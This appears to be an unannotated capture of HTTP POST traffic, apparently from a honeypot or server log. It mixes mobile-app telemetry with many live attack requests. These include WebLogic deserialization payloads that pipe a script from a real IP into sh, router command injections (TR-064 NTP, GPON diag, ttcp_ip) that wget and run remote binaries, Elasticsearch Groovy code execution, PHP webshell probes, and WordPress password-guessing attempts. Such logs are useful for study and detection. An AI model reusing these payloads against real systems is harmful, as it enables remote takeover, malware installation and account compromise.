EKNYyd/AYJdOSbVBcr0zIs8/xZpT+F9nVAz+Bhcoln2pXeQY0cTstscKhrfoTgd0whMByvaWLvKp6U5DcwT9gwT/MQGoWTJccSl2O12BWhRZXqkMTg20x1WfT7i75BwGeSg2qgI6aszAAxJ9jTYu3VD6aTrGUvHN2UBnmREHzMd6M/oypHJaKs1aqWvuu5jM+oWms37zuiAemhKW4F0tQaiWF9uZANPU/lMTSax2DD8NzcU+lfCmlWB1qTeQgL/H5uqS+35qU1MHE+6Tk0+ZM35m1Bhi3TlW0f3r72k5bHtdkoOf+CVjl9BYldnmFgK4t+LhSxybyBGjzY2rT0bmAAi+Z7Aex1fBUz57LC2dJAT8iwWdzd0=
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache
RvYKwozANsKNTz9RhRa4DOZY7KtYhQOflRNJHF1G0eueDAYmjjsj3Racf2t/H22OestMovkxPilv92blwhGNg9DxKXHicsH0yluDlomLVA0PSkMjFOkHqNbhuvzajZwB5okXwHrCUVdRvaZsqeMAR5iyj69zPcFEoTNm9VLlqPJ1abWisJ5ItDf6fhuPLuU9rqMNbHl7NSqL4Il3VKhm6PlNFNktR5PV3KKWzx3+HjEFZkV7N1KdCODHD8iGyyhQqy+V63od1RogDebdtW6lnwND18Tvm59eayU0F5pdVCERYmk7z64gxwU7AUx4WrhVA7UlqUFl5eWIJMslkO8hnD0iVGOSsR4sGM7UNOr7k6xpmjgUozaGEv5frzCtei1ahsMpuTciksRRn8NDRBxp0AjKO3lXe9NK3OCm0cFNa4GzXIH8au1bFgk=
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1045
Content-Type: multipart/form-data; boundary=MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
597225
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
4b14b82d13659820ac222726501107f5
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--MI08l2FG5DT-108FbSMTyEysCLbD77-ibu--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
axa=die((string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
RaxfxtvLMD8LhyRQ4Ja0XT9tiRJULMs/hkS6xVToknRPG7ZnoFUZy9SCxTnzxRnLzn9vvZLGUiXl343dBQ/96cqczM/fa2YkidCsjm78vpzQ4sTnRoBeQb3LoK2yhFNxncTWO7YGWbjbJkT+AD22MJKSVPVxwZDkbvq+IIR56UIsjDPd2gRPCY8702Z4ldcGnkbadnNloCstRADLCpl+XtnjHVbuJoqZl/yKzZgJKyTVEifg4Z7lUNPiDxK85bpc581zDzdlY8k/l77YwIRrx2KJyYZ9xunm8te1V62PVPvdxb5CBWFkzEEJVEVFdTAMcxGuFbs19Q9ppur9DIAWKSKKJ5LIPsffDG8SZSiIvcPvcQlt6PxSNIQj6Faxi1LlSByT
POST http://check.proxyradar.com/azenv.php?auth=149134299065&a=PSCMN&i=1082764042&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558
.:"gÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjb¸#AE|HÅn˝Öä-¢;W´X'ª∫ïÃû?Êtú§~_g»j±euï¥_∆ƒæƒØâm›
^»ï”Ëz(∑ÅtπRK}£íÊ|?ó.»µ-BA¢ëf –◊éZpo@ΩóXÂ*6H6ˆBO˛gÄjí"¡êpH/¬ï(O&ög\»:nÌ(∑^5¨1¨+Vjß-q˜•kØ=˘•2V‘
PÄÆ6*ÎcÆéÊv…Qûî\ºÚíˆ<≤PÊ∞ê⁄´u◊†Ë≠z›ÊÔÛiê/˙¥ä∑√íÜfè3Nbò”gò≠–¶tT∏∑®÷g®˝´PìÆæÃe(˙SÌÀ`›´–ÚÄëi6!˝’É¢˝|Ô¥ÇÓ‹€ÓJL‡LÒóπ… Å˝ßä≥–ãDâ¡¥≈3äæi£øËaÙ9Z¸¢ë3~ ª’X<Ôºm‚°jPnèÈÕ8\Âı?#°†"Ë⛶Âm∞≠iTé\M¥>ŒÁ\òô¸6gùè∆∞¶Ú·E˙´ÙV?>éà (≥’í~!èÔ€Q:ÃÉúªD*Eb̸£’«>k≤Iï∞îgGÜ∏gãzv9!Üf>wîËr‰“9<ò®ßbjóÊ–˚VŒœè·˝»0¨∞ÙÈÌã÷üÄ2€nã]√∏»ö™˘Õl‘cÃvhÄÀò)F≥÷àùî
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache
RvMLktLBYexuG+2IsAK6l2Rzwt7iXShVIo3/nZJvU271dlUNUqLnELBQdE4tuAr8ezmvLZ83dfcMpc5ediDZCV+9pVK5n04OGiHYdUehH5kXKZpYXfFYETbN9/LbQRhQ0pZC03NpMokI8OVX8WeWFcgHoyl0hSYtG8i9qV3RbVtD45J6jPqZ1kwAIwTu1xeKfHjp5BbnXC0BtwyuEe8hJ+TG31uLtaKym7nw76JoAaYnn4dRKB7SJXvCKjrqe7AXi05y5ll5ov9Kpk9EJxmPS+IHhi+3BYQwU/Gt8iOKWHpsbXeo2nnXpww/UDcbi7+8UQc60pHx+kKThaRj5NeRkloTnAut8hwQaN3+hwZ6K9gOddS+3Upz6NtSXSKK6/pO
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
RPELk9/IYTiXrFzUx0ujfayGlEDZhn+UH1UWQ4za6Z9xZuENVRxDXVyrPXcwB7iApqJcUhRoagk722HdW4u+rEIuEGGM+rz6yguY6cua30O7fIl7vxEeIXC3jGfGuLBUCh8/D2/pCe/kLLgMOQIsgZg3UEI2os0MiTJf5SzvWZP9r8iJra23WZ8fMZtbe7VuUSOkJ0cEwLg0kg5ozwiF3GZ+JPlV4KFYiBqyMA1AYCrsdSJmUUXiIPx2GttpgDUTQ+1k+VwJ+zEYRVqHGyPvVd/DAVgiWcCTUBJHv3z7Jzf/sdohsfRvZ30NHV6E/TWMc02u76c0H8Kvk8/BmCoRWwAP8RjnajBwEDB5KpfrhdvE7jVLJ98tNQ==
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
FqRcyNibZP5kh9uJiq3YHoA8IW5a0QMaG/jdauFDEwc9F2/87gKU6kyE2rIvNi+b4yGrwIK43KEN8HNVC6LELYaEEyk2/JP+SZVy+nIMklUg/2lrqchtEJlGFYIs29Hup0IjlQvS0fMLSFG2tbMzFVyxq0X3M68E73dWZyMDmqG4gzWt6NI7mbF0XifhroQ8X31kzHr5KiVoliIqKEja1zTEGzUak+jmJRYIAS02M/7gpLUu7ffjwn64xAEhzJ8Y36hPQeTCI+zWQwg305916mZxeKEga/GaU2+fXBaCbl9EmmEtCspbPDUMGH6ZLh+CpkpKQ+pRLq7dIkREMuTBaKY330LWrHfOz40fck5qW8aUu0AF2pKRrPhDyESxXGpTwId93zdlIyu8EksNxgiygQ==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
SvEMkN7LbbKXO3/J1DieuygfX7AQOL9/CPPJbA3fNcYaj3svESxFRuyXIlU226qbNtWTujmPL5zcaOdv2wWNHlBvDW5XRH99lMFT26/tO1+BodwUKxRk1zk6gLRYCObNTwBo12q+b3BW35LSiz7yEIC+mxuNPKMt5aSuQF95hUGP0svigGdpersP0Aic4BJ5BYdSFFqaJklIAjp2WPEZ612I02Ljl2HWWdiptWCUN1xOfLdko2mzHwjYIU9pUk+D5a/LhIEkLMB1OjklfE5ZRpwJwYIiEXQWvAxZUk3WYhMFgMFoxP3dzxVBhXFnntMRYMpHQlR3RpyYkvHdUA+wj7rh2ZgKNKBWplxmx0C8nEo8vTW7pi2wYMy6xLjF
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E 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</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
EKdXldzKYsuefFoxTIstsBtZfnAMmID71mpqXRSjCW4q6kKzromHJyUCUO9GgV6KnOLP+bvt+NeUpI5BpyckWVz2wBkzJq3RHejq/0KD2ue8zdxKlWK+9rIYY+qNJPgb+LjXXstg12oAfECLLXQP+5nPcAS0fKZvTX0xNnP5jd6M7RR7DHx9jmwBsY6OiuchoBGaRzCiho8/sIOm1Uit8vUNwEgoNGl4fd8ywJlHcfAOMBMW+zkno5U28F/CTbm0KU52PdXLd+Ur5cY5ySFbbRBe9Zg/L71/2DBZKsytrVz6X/7Iy7kTYLdMob8mCrDf1v08WBtmM2BOvm+8xCaPiZUlpqpNp1v7i2aI10OdR7hm1hSEtHoxMoEd9IPXJlOntttY7zjiYVnfk3sgvy1JAuLKerdcbNbwhovJrA==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494584421079
X-Umeng-Sdk: Android/5.6.4 Diamond+Royal%2F2.1.1+MI+4LTE%2F4.4.4+AAC2B6BE6AF07FA699F07E561EF0D262
Msg-Type: envelope
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
2b7
0
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 361
n=174321358232145&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yNDMuMjUzHBgAGAAYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GRwYEjExMS4yMDYuMjAwLjI6NTIyMhUAFQIWiCIVABsAAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1496625706271&s=589FA0D306794207B9C5A4BA69BAB35F
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /xmlrpc.php HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check
<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=152347789179&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1494667820963,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å⁄‰¸,Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl
POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38
&KÜWÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kä^H
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1036
Content-Type: multipart/form-data; boundary=eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
73114
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
223e313bed87535815c57e37cd7d7858
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
QaEPldqdY2fxDsA5lCqmAolQZU22g9FaJj46b5oMAhVjad0kqUxWleQ8Kw7HX5i74hPyhLiSPOTYXgm5pWKpYPCdyyfGl8I99BZklQEvbST79MxC6M65u3ZFGWQCfpiOy7Wq2rB2C1ZIoGw6hNzYouO14SG89tFHpvfww8UkCGFfKFbvReA3fuBOULThz/Nf8Q/9hdyh9ub9db34YZuv0fk1Uti2jjDSBhtoEYy/pliSAGQokimRMi2wyC0BVkajXhzJ/j6NVYfUoFKsHvBxnvpVWlXQ9jSrMLnBJn3mNiP6BEFtSDC943+yPbEj8n0Wh3RlXuqPT5q3UhapIqBoXdZoxS3RW4K7MvMSYmldfl3D2oQKbz/Sq9FTF0XAQzKaCAWw
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 29
Cache-Control: no-cache
log=jamesatchue&pwd=passw0rd1
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
R6FYwtPOZTXTOB919aU3dFKr6xC7SXEKdAiZRfjGPmZHmdgn4Gdzx0DW3UnNeVv8dt07mtUwJuYnqIkL8oeb4I2fViq1FiSACOKwXMa9v9yKsMSDvB9APolFNX2ldwAFLgfNoeqC2nayGxduV+voJGDpTq/QX1f1iPKuGpttoD4EJGCOoaAS/FWnprhZ4FnH3pRgya1qpDetqSESqsUtctyhhng29+5PTLowxIdrALwhVEZ0QI72caa8fI85vRe6VcKJfclSZxm1KLsrmoRdwenme3Nxu1Zvdx7pzed7PZIK5pJUJn09psPGb7hkAiUHw94NXPS+tNAsP68HPddvQALeEBeQ+x93VHD/A/6NvYuErHHTy0P/AOUNrxZRb3miXvcIJXXeTfuBk5GQLis8tHU9B2FxEg==
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=9999999
POST http://www.yaramaz.com/mobil/giris.php?v=2017430169535 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
Host: www.yaramaz.com
Pragma: no-cache
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Cookie: misafirid=1230248; ipa2=1
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
